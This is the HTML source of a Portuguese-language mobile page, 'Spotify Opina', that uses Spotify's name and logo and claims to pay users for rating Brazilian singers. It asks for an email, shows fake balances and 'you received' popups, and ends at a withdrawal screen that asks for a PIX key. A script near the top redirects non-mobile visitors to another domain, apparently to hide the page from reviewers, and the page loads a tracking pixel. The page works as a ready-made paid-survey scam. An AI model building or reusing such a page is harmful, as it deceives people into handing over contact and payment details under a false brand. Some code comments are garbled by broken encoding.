<!DOCTYPE html><html lang="pt-BR"><head>

    <script src="js/latest.js" data-utmify-prevent-xcod-sck="" data-utmify-prevent-subids="" async="" defer=""></script>

<script>
  window.pixelId = "677d9d1012d4c0335e9a547f";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<script type="text/javascript">
  //digite a url de redirect
  var url_link_redirect_pc = "https://superpremiado.com/landing";

  //function js
  function isMobile() {
   const regex = /Mobi|Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i;
   return regex.test(navigator.userAgent);
  }

  //validation js
  if (isMobile()) { console.log("Mobile device detected"); } else {
   window.location = url_link_redirect_pc;
  }
 </script>

<title>Spotify Opina | Avalie</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <link rel="icon" href="images/spotifylogo.png" type="image/png">
	<link href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200" rel="stylesheet">
	<link href="https://fonts.googleapis.com/" rel="preconnect">
	<link crossorigin="" href="https://fonts.gstatic.com/" rel="preconnect">
	<link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@500&display=swap" rel="stylesheet">
	<link href="css/styles.css" rel="stylesheet"><script src="js/jquery-3.6.4.min.js"></script><script src="js/js.cookie.min.js"></script>
</head>
<body bis_frame_id="263" bis_status="ok">
<p>
<audio id="meuAudio"><source src="media/dinheiro.mp3" type="audio/mp3"></audio>

<!--------------------- Pagina de login" ---------------------></p>

<div id="login" style="display: block;">
<div style="padding-top:30%;"></div>

<div class="outer-box-login">
<div class="white-box-login"><img src="images/opinilogo.png" style="width:30%; margin: 0 auto; display: flex;">
<p class="popup-textL" style="text-align: center; color: rgb(101, 101, 101); font-weight: bold; font-size: 18px;">Bem-vindo(a) ao SpotifyOpina</p>

<p class="popup-textL" style="text-align: center; color: rgb(101, 101, 101); font-size: 15px;">Insira seu e-mail para prosseguir!</p>
<input class="form-input" for="email" id="email" name="email" oninput="validateEmail()" placeholder="E-mail" style="margin-top:20px;" type="text"><button class="prosseguir-button" href="#" id="prosseguir-button" onclick="verificarCampos()" style="margin-top: 15px;">ENTRAR</button>

<div style="margin-bottom: 10px;"></div>
</div>
</div>

<div class="footer-text">
<p style="text-align: center; color: rgb(101, 101, 101); font-size: 15px; margin-top: 30px; font-weight: bold;">2024 Spotify LLC</p>

<p style="text-align: center; color: rgb(101, 101, 101); font-size: 14px; margin-top: -10px; margin-bottom: 0px;">Termos e Politica de Privacidade</p>
</div>
</div>

<div id="inicio" style="display: none;">
<div class="menu"><a style="width: 30%; "> <img src="images/opinilogo.png" style="width:  110px;"> </a>

<div class="buttons-container" href="#" onclick="mostrarPagina('saque')" style="width: 45%;">
<div class="valor-box"><span id="valor" style="font-family: 'Montserrat', sans-serif; max-width: 100%;">R$ 100.00</span></div>
</div>
</div>

<div style="margin-bottom: 100px;"></div>
<!--------------------- Anuncio 1 --------------------->

<div class="outer-box" id="ad1" style="display: block;">
<div class="white-box">
<p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$33,00!</p>

<div class="imagem"><img src="images/matue.png" style="width: 50%; margin: 0 auto; display: flex; border-radius: 15px;"></div>

<p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas de Matuê?</p>

<div class="rating-container" id="rating-container-1"><button class="rating-button" data-rating="1">1</button><button class="rating-button" data-rating="2">2</button><button class="rating-button" data-rating="3">3</button><button class="rating-button" data-rating="4">4</button><button class="rating-button" data-rating="5">5</button></div>

<p class="pergunta-whats">Recomendaria o cantor Matuê para seus amigos e familiares?</p>

<div class="rating-container" id="rating-container-2"><button class="rating-button" data-rating="1">Sim</button><button class="rating-button" data-rating="2">Não</button></div>

<p class="pergunta-whats">Qual faixa etária você acha que mais escuta o cantor Matuê?</p>

<div class="rating-container" id="rating-container-3"><button class="rating-button" data-rating="1">-18 anos</button><button class="rating-button" data-rating="2">+18 anos</button></div>
<button class="enviarCodigo" id="B1" onclick="showLoadingB1();" type="button">Enviar respostas</button></div>
</div>
<!---- Popup B1 ---->




<div class="popup-container" id="popupB1"><script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script><dotlottie-player autoplay="" background="transparent.html" loop="" speed="1" src="https://lottie.host/dfcc0486-0a2c-42d7-b454-1922410a517d/ccVkLniJIv.json" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;"></dotlottie-player> <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span> <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 33,00</span></div>
<!--------------------- Anuncio 2 --------------------->

<div class="outer-box" id="ad2" style="display: none;">
<div class="white-box">
<p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$34,00!</p>

<div class="imagem"><img src="images/LuanSantana.jpg" style="width: 70%; margin: 0 auto; display: flex; border-radius: 15px;"></div>

<p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas do Luan Santana?</p>

<div class="rating-container" id="rating-container-1"><button class="rating-button" data-rating="1">1</button><button class="rating-button" data-rating="2">2</button><button class="rating-button" data-rating="3">3</button><button class="rating-button" data-rating="4">4</button><button class="rating-button" data-rating="5">5</button></div>

<p class="pergunta-whats">Recomendaria o cantor Luan Santana para seus amigos e familiares?</p>

<div class="rating-container" id="rating-container-2"><button class="rating-button" data-rating="1">Sim</button><button class="rating-button" data-rating="2">Não</button></div>

<p class="pergunta-whats">Qual faixa etária você acha que mais escuta o cantor Luan Santana?</p>

<div class="rating-container" id="rating-container-3"><button class="rating-button" data-rating="1">-18 anos</button><button class="rating-button" data-rating="2">+18 anos</button></div>
<button class="enviarCodigo" id="B2" onclick="showLoadingB2();" type="button">Enviar respostas</button></div>
</div>
<!---- Popup B2 ---->

<div class="popup-container" id="popupB2"><script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script><dotlottie-player autoplay="" background="transparent.html" loop="" speed="1" src="https://lottie.host/dfcc0486-0a2c-42d7-b454-1922410a517d/ccVkLniJIv.json" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;"></dotlottie-player> <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span> <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 34,00</span></div>
<!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p3" ---------------------->

<div class="outer-box" id="ad3" style="display: none;">
<div class="white-box">
<p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$47,00!</p>

<div class="imagem"><img src="images/poze.jpg" style="width: 50%; margin: 0 auto; display: flex; border-radius: 15px;"></div>

<p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas do Mc Poze?</p>

<div class="rating-container" id="rating-container-1"><button class="rating-button" data-rating="1">1</button><button class="rating-button" data-rating="2">2</button><button class="rating-button" data-rating="3">3</button><button class="rating-button" data-rating="4">4</button><button class="rating-button" data-rating="5">5</button></div>

<p class="pergunta-whats">Recomendaria o cantor Mc Poze para seus amigos e familiares?</p>

<div class="rating-container" id="rating-container-2"><button class="rating-button" data-rating="1">Sim</button><button class="rating-button" data-rating="2">Não</button></div>

<p class="pergunta-whats">Qual faixa etária você acha que mais escuta o cantor Mc Poze?</p>

<div class="rating-container" id="rating-container-3"><button class="rating-button" data-rating="1">-18 anos</button><button class="rating-button" data-rating="2">+18 anos</button></div>
<button class="enviarCodigo" id="B3" onclick="showLoadingB3();" type="button">Enviar respostas</button></div>
</div>
<!---- Popup B3 ---->

<div class="popup-container" id="popupB3"><script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script><dotlottie-player autoplay="" background="transparent.html" loop="" speed="1" src="https://lottie.host/dfcc0486-0a2c-42d7-b454-1922410a517d/ccVkLniJIv.json" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;"></dotlottie-player> <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span> <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 47,00</span></div>
<!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p4" ---------------------->

<div class="outer-box" id="ad4" style="display: none;">
<div class="white-box">
<p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$43,00!</p>

<div class="imagem"><img src="images/annita.jpg" style="width: 80%; margin: 0 auto; display: flex; border-radius: 15px;"></div>

<p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas de Anitta?</p>

<div class="rating-container" id="rating-container-1"><button class="rating-button" data-rating="1">1</button><button class="rating-button" data-rating="2">2</button><button class="rating-button" data-rating="3">3</button><button class="rating-button" data-rating="4">4</button><button class="rating-button" data-rating="5">5</button></div>

<p class="pergunta-whats">Recomendaria a cantora Anitta para seus amigos e familiares?</p>

<div class="rating-container" id="rating-container-2"><button class="rating-button" data-rating="1">Sim</button><button class="rating-button" data-rating="2">Não</button></div>

<p class="pergunta-whats">Qual faixa etária você acha que mais escuta a cantora Anitta?</p>

<div class="rating-container" id="rating-container-3"><button class="rating-button" data-rating="1">-18 anos</button><button class="rating-button" data-rating="2">+18 anos</button></div>
<button class="enviarCodigo" id="B4" onclick="showLoadingB4();" type="button">Enviar respostas</button></div>
</div>
<!---- Popup B4 ---->

<div class="popup-container" id="popupB4"><script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script><dotlottie-player autoplay="" background="transparent.html" loop="" speed="1" src="https://lottie.host/dfcc0486-0a2c-42d7-b454-1922410a517d/ccVkLniJIv.json" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;"></dotlottie-player> <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span> <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 43,00</span></div>
<!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p5" ---------------------->

<div class="outer-box" id="ad5" style="display: none;">
<div class="white-box">
<p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$52,00!</p>

<div class="imagem"><img src="images/ludmillaa.jpg" style="width: 80%; margin: 0 auto; display: flex; border-radius: 15px;"></div>

<p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas de Ludmilla?</p>

<div class="rating-container" id="rating-container-1"><button class="rating-button" data-rating="1">1</button><button class="rating-button" data-rating="2">2</button><button class="rating-button" data-rating="3">3</button><button class="rating-button" data-rating="4">4</button><button class="rating-button" data-rating="5">5</button></div>

<p class="pergunta-whats">Recomendaria a cantora Ludmilla para seus amigos e familiares?</p>

<div class="rating-container" id="rating-container-2"><button class="rating-button" data-rating="1">Sim</button><button class="rating-button" data-rating="2">Não</button></div>

<p class="pergunta-whats">Qual faixa etária você acha que mais escuta a cantora Ludmilla?</p>

<div class="rating-container" id="rating-container-3"><button class="rating-button" data-rating="1">-18 anos</button><button class="rating-button" data-rating="2">+18 anos</button></div>
<button class="enviarCodigo" id="B5" onclick="showLoadingB5();" type="button">Enviar respostas</button></div>
</div>
<!---- Popup B5 ---->

<div class="popup-container" id="popupB5"><script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script><dotlottie-player autoplay="" background="transparent.html" loop="" speed="1" src="https://lottie.host/dfcc0486-0a2c-42d7-b454-1922410a517d/ccVkLniJIv.json" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;"></dotlottie-player> <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span> <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 52,00</span></div>
<!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p6" ---------------------->

<div class="outer-box" id="ad6" style="display: none">
<div class="white-box">
<p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$32,00!</p>

<div class="imagem"><img src="images/mcabelin.jpg" style="width: 85%; margin: 0 auto; display: flex; border-radius: 15px;"></div>

<p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas de MC Cabelin?</p>

<div class="rating-container" id="rating-container-1"><button class="rating-button" data-rating="1">1</button><button class="rating-button" data-rating="2">2</button><button class="rating-button" data-rating="3">3</button><button class="rating-button" data-rating="4">4</button><button class="rating-button" data-rating="5">5</button></div>

<p class="pergunta-whats">Recomendaria o cantor MC Cabelin para seus amigos e familiares?</p>

<div class="rating-container" id="rating-container-2"><button class="rating-button" data-rating="1">Sim</button><button class="rating-button" data-rating="2">Não</button></div>

<p class="pergunta-whats">Qual faixa etária você acha que mais escuta o cantor MC Cabelin?</p>

<div class="rating-container" id="rating-container-3"><button class="rating-button" data-rating="1">-18 anos</button><button class="rating-button" data-rating="2">+18 anos</button></div>
<button class="enviarCodigo" id="B6" onclick="showLoadingB6();" type="button">Enviar respostas</button></div>
</div>
<!---- Popup B6 ---->

<div class="popup-container" id="popupB6"><script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script><dotlottie-player autoplay="" background="transparent.html" loop="" speed="1" src="https://lottie.host/dfcc0486-0a2c-42d7-b454-1922410a517d/ccVkLniJIv.json" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;"></dotlottie-player> <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span> <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 32,00</span></div>
<!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p7" ---------------------->

<div class="outer-box" id="ad7" style="display: none">
<div class="white-box">
<p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$32,00!</p>

<div class="imagem"><img src="images/mcdaniel.jpg" style="width: 75%; margin: 0 auto; display: flex; border-radius: 15px;"></div>

<p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas de Mc Daniel?</p>

<div class="rating-container" id="rating-container-1"><button class="rating-button" data-rating="1">1</button><button class="rating-button" data-rating="2">2</button><button class="rating-button" data-rating="3">3</button><button class="rating-button" data-rating="4">4</button><button class="rating-button" data-rating="5">5</button></div>

<p class="pergunta-whats">Recomendaria o cantor Mc Daniel para seus amigos e familiares?</p>

<div class="rating-container" id="rating-container-2"><button class="rating-button" data-rating="1">Sim</button><button class="rating-button" data-rating="2">Não</button></div>

<p class="pergunta-whats">Qual faixa etária você acha que mais escuta o cantor Mc Daniel?</p>

<div class="rating-container" id="rating-container-3"><button class="rating-button" data-rating="1">-18 anos</button><button class="rating-button" data-rating="2">+18 anos</button></div>
<button class="enviarCodigo" id="B7" onclick="showLoadingB7();" type="button">Enviar respostas</button></div>
</div>
<!---- Popup B7 ---->

<div class="popup-container" id="popupB7"><script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script><dotlottie-player autoplay="" background="transparent.html" loop="" speed="1" src="https://lottie.host/dfcc0486-0a2c-42d7-b454-1922410a517d/ccVkLniJIv.json" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;"></dotlottie-player> <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span> <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 32,00</span></div>
<!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p8" ---------------------->

<div class="outer-box" id="ad8" style="display: none">
<div class="white-box">
<p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$27,00!</p>

<div class="imagem"><img src="images/ivete.jpg" style="width: 80%; margin: 0 auto; display: flex; border-radius: 15px;"></div>

<p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas da Ivete Sangalo?</p>

<div class="rating-container" id="rating-container-1"><button class="rating-button" data-rating="1">1</button><button class="rating-button" data-rating="2">2</button><button class="rating-button" data-rating="3">3</button><button class="rating-button" data-rating="4">4</button><button class="rating-button" data-rating="5">5</button></div>

<p class="pergunta-whats">Recomendaria a cantora Ivete Sangalo para seus amigos e familiares?</p>

<div class="rating-container" id="rating-container-2"><button class="rating-button" data-rating="1">Sim</button><button class="rating-button" data-rating="2">Não</button></div>

<p class="pergunta-whats">Qual faixa etária você acha que mais escuta a cantora Ivete Sangalo?</p>

<div class="rating-container" id="rating-container-3"><button class="rating-button" data-rating="1">-18 anos</button><button class="rating-button" data-rating="2">+18 anos</button></div>
<button class="enviarCodigo" id="B8" onclick="showLoadingB8();" type="button">Enviar respostas</button></div>
</div>
<!---- Popup B8 ---->

<div class="popup-container" id="popupB8"><script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script><dotlottie-player autoplay="" background="transparent.html" loop="" speed="1" src="https://lottie.host/dfcc0486-0a2c-42d7-b454-1922410a517d/ccVkLniJIv.json" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;"></dotlottie-player> <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span> <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 27,00</span></div>
<!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p9" ---------------------->

<div class="outer-box" id="ad9" style="display: none">
<div class="white-box">
<p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$30,00!</p>

<div class="imagem"><img src="images/wesley.jpg" style="width: 80%; margin: 0 auto; display: flex; border-radius: 15px;"></div>

<p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas de Wesley Safadão?</p>

<div class="rating-container" id="rating-container-1"><button class="rating-button" data-rating="1">1</button><button class="rating-button" data-rating="2">2</button><button class="rating-button" data-rating="3">3</button><button class="rating-button" data-rating="4">4</button><button class="rating-button" data-rating="5">5</button></div>

<p class="pergunta-whats">Recomendaria o cantor Wesley Safadão para seus amigos e familiares?</p>

<div class="rating-container" id="rating-container-2"><button class="rating-button" data-rating="1">Sim</button><button class="rating-button" data-rating="2">Não</button></div>

<p class="pergunta-whats">Qual faixa etária você acha que mais escuta o cantor Wesley Safadão?</p>

<div class="rating-container" id="rating-container-3"><button class="rating-button" data-rating="1">-18 anos</button><button class="rating-button" data-rating="2">+18 anos</button></div>
<button class="enviarCodigo" id="B9" onclick="showLoadingB9();" type="button">Enviar respostas</button></div>
</div>
<!---- Popup B9 ---->

<div class="popup-container" id="popupB9"><script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script><dotlottie-player autoplay="" background="transparent.html" loop="" speed="1" src="https://lottie.host/dfcc0486-0a2c-42d7-b454-1922410a517d/ccVkLniJIv.json" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;"></dotlottie-player> <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span> <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 30,00</span></div>
<!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p10" ---------------------->

<div class="outer-box" id="ad10" style="display: none">
<div class="white-box">
<p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$43,00!</p>

<div class="imagem"><img src="images/alok.jpg" style="width: 80%; margin: 0 auto; display: flex; border-radius: 15px;"></div>

<p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas de Alok?</p>

<div class="rating-container" id="rating-container-1"><button class="rating-button" data-rating="1">1</button><button class="rating-button" data-rating="2">2</button><button class="rating-button" data-rating="3">3</button><button class="rating-button" data-rating="4">4</button><button class="rating-button" data-rating="5">5</button></div>

<p class="pergunta-whats">Recomendaria o cantor Alok para seus amigos e familiares?</p>

<div class="rating-container" id="rating-container-2"><button class="rating-button" data-rating="1">Sim</button><button class="rating-button" data-rating="2">Não</button></div>

<p class="pergunta-whats">Qual faixa etária você acha que mais escuta o cantor Alok?</p>

<div class="rating-container" id="rating-container-3"><button class="rating-button" data-rating="1">-18 anos</button><button class="rating-button" data-rating="2">+18 anos</button></div>
<button class="enviarCodigo" id="B10" onclick="showLoadingB10();" type="button">Enviar respostas</button></div>
</div>
<!---- Popup B10 ---->

<div class="popup-container" id="popupB10"><script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script><dotlottie-player autoplay="" background="transparent.html" loop="" speed="1" src="https://lottie.host/dfcc0486-0a2c-42d7-b454-1922410a517d/ccVkLniJIv.json" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;"></dotlottie-player> <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span> <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 43,00</span></div>
<!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p11" ----------------------><!--------------------- Limite atingido --------------------->

<div class="popup-containerL" id="popupL">
<div id="container-progresso" style="display: flex; margin: 0 auto; width: 300px; height: 300px;"><svg id="barra-progresso-svg" viewBox="0 0 36 36"> <circle cx="18" cy="18" fill="none" r="16" stroke="#ccc" stroke-width="3"></circle> <circle cx="18" cy="18" fill="none" id="minha-barra-progresso" r="16" stroke="#06B32E" stroke-dasharray="0 1000" stroke-width="3"></circle> </svg>

<div id="texto-progresso"><span id="valor-saque" style="font-family: 'Montserrat', sans-serif; font-size: 23px;">R$100.00</span> <span style="font-family: 'Montserrat', sans-serif; color: #202020; font-size: 14px;">Seu saldo subiu!</span></div>
</div>

<p style="font-family: 'Montserrat', sans-serif; font-size: 32px; color: #28a745; text-align: center; margin-top: 15px; margin-bottom: -5px;">Parabens!</p>

<p class="popup-textL" style="margin-bottom: 20px; font-size: 18px; color: #636363">Voce atingiu seu<br>
limite diario!</p>
<button class="desbloquear-button" href="#" onclick="mostrarPagina('saque')" style="font-weight: bold; font-size: 18x; border-radius: 12px; margin-top: 15px;">SAQUE AGORA</button></div>
<!--------------------- Menu debaixo --------------------->

<div style="margin-bottom: 80px;"></div>

<div class="menuemb"><!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "InÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â­cio" --><a href="#" onclick="mostrarPagina('saque')"><span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: rgb(101, 101, 101);">paid</span> </a> <!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "Pagina 2" --> <a href="#" onclick="mostrarPagina('inicio')"> <span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: #06B32E;">home</span> </a> <!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "Saque" --> <a href="#" onclick="mostrarPagina('bonus')"> <span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: rgb(101, 101, 101);">help</span> </a></div>
</div>
<!--------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "Saque" --------------------->

<div id="saque" style="display: none;">
<div class="menu"><a style="width: 30%; "> <img src="images/opinilogo.png" style="width:  110px;"> </a></div>

<div style="margin-bottom: 100px;"></div>

<div class="outer-box">
<div class="valor-box-saque">
<p style="font-size: 16px; margin-bottom: 15px; text-align: center; color: rgb(101, 101, 101);">Seu saldo</p>
<span id="valor-money" style="font-size: 45px; text-align: center; font-family: 'Montserrat', sans-serif; letter-spacing: -2px; color: #06B32E;">R$ 67.00</span></div>
</div>

<p style="margin-bottom: 18px; margin-top: 23px; color: rgb(101, 101, 101); text-align: center; font-weight: bold;">Selecione seu tipo de chave PIX</p>

<div class="button-container"><button class="square-button" onclick="toggleButton(1)"><img alt="Botao 1" decoding="async" src="images/cpf.png"></button><button class="square-button" onclick="toggleButton(2)"><img alt="Botao 2" decoding="async" src="images/telefone.png"></button><button class="square-button" onclick="toggleButton(3)"><img alt="Botao 3" decoding="async" src="images/email.png"></button><button class="square-button" onclick="toggleButton(4)"><img alt="Botao 4" decoding="async" src="images/qr.png"></button></div>

